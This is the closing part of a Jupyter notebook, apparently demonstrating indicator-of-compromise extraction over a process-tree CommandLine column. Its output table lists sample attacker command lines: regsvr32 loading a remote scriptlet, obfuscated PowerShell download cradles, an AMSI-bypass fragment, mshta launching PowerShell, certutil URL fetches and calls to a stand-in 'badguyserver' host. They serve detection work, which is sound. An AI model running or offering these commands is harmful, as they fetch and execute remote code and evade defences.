       "16           49   \n",
       "17           67   \n",
       "18           77   \n",
       "19           77   \n",
       "20           78   \n",
       "21           81   \n",
       "22           90   \n",
       "23          102   \n",
       "24          102   \n",
       "\n",
       "                                                                                                  Input  \n",
       "0   cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft...  \n",
       "1                                            .\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll  \n",
       "2                                            .\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll  \n",
       "3   .\\powershell.exe  -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"...  \n",
       "4   cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...  \n",
       "5   cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...  \n",
       "6                                         cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "7                                         cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "8                                         cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "9                                         cmd  /c \"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\"  \n",
       "10                                                        implant.exe  81ed03caf6901e444c72ac67d192fb9c  \n",
       "11      cmd  /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"   \n",
       "12      cmd  /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"   \n",
       "13  .\\powershell  -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...  \n",
       "14  .\\powershell  -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...  \n",
       "15                                                                   .\\powershell  Invoke-Shellcode.ps1  \n",
       "16                                                            .\\powershell  Invoke-ReverseDnsLookup.ps1  \n",
       "17  cmd  /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.e...  \n",
       "18  .\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutil...  \n",
       "19  .\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutil...  \n",
       "20  netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\b...  \n",
       "21                                           cmd  /c \"powershell wscript.shell used to download a .gif\"  \n",
       "22                                         c:\\Diagnostics\\UserTmp\\ransomware.exe   @ abc.com abc.wallet  \n",
       "23                                                     certutil  -urlcache -split -f http://127.0.0.1/   \n",
       "24                                                     certutil  -urlcache -split -f http://127.0.0.1/   "
      ]
     },
     "execution_count": 23,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "# Run IoC extraction over the CommandLine column of `process_tree` only.\n",
    "process_tree.mp.ioc_extract(\n",
    "    columns=[\"CommandLine\"],\n",
    ")"
   ]
  }
 ],
 "metadata": {
  "celltoolbar": "Tags",
  "hide_input": false,
  "interpreter": {
   "hash": "2bc37074a50de3994d4ebdf9197e864a43c9c15c9793b7f9f3363bcff9457253"
  },
  "kernelspec": {
   "display_name": "Python [conda env:condadev] *",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.9.7"
  },
  "latex_envs": {
   "LaTeX_envs_menu_present": true,
   "autoclose": false,
   "autocomplete": true,
   "bibliofile": "biblio.bib",
   "cite_by": "apalike",
   "current_citInitial": 1,
   "eqLabelWithNumbers": true,
   "eqNumInitial": 1,
   "hotkeys": {
    "equation": "Ctrl-E",
    "itemize": "Ctrl-I"
   },
   "labels_anchors": false,
   "latex_user_defs": false,
   "report_style_numbering": false,
   "user_envs_cfg": false
  },
  "toc": {
   "base_numbering": 1,
   "nav_menu": {
    "height": "318.996px",
    "width": "320.994px"
   },
   "number_sections": false,
   "sideBar": true,
   "skip_h1_title": false,
   "title_cell": "Table of Contents",
   "title_sidebar": "Contents",
   "toc_cell": false,
   "toc_position": {
    "height": "calc(100% - 180px)",
    "left": "10px",
    "top": "150px",
    "width": "165px"
   },
   "toc_section_display": true,
   "toc_window_display": true
  },
  "varInspector": {
   "cols": {
    "lenName": 16,
    "lenType": 16,
    "lenVar": 40
   },
   "kernels_config": {
    "python": {
     "delete_cmd_postfix": "",
     "delete_cmd_prefix": "del ",
     "library": "var_list.py",
     "varRefreshCmd": "print(var_dic_list())"
    },
    "r": {
     "delete_cmd_postfix": ") ",
     "delete_cmd_prefix": "rm(",
     "library": "var_list.r",
     "varRefreshCmd": "cat(var_dic_list()) "
    }
   },
   "position": {
    "height": "406.193px",
    "left": "1468.4px",
    "right": "20px",
    "top": "120px",
    "width": "456.572px"
   },
   "types_to_exclude": [
    "module",
    "function",
    "builtin_function_or_method",
    "instance",
    "_Feature"
   ],
   "window_display": false
  },
  "widgets": {
   "application/vnd.jupyter.widget-state+json": {
    "state": {},
    "version_major": 2,
    "version_minor": 0
   }
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}
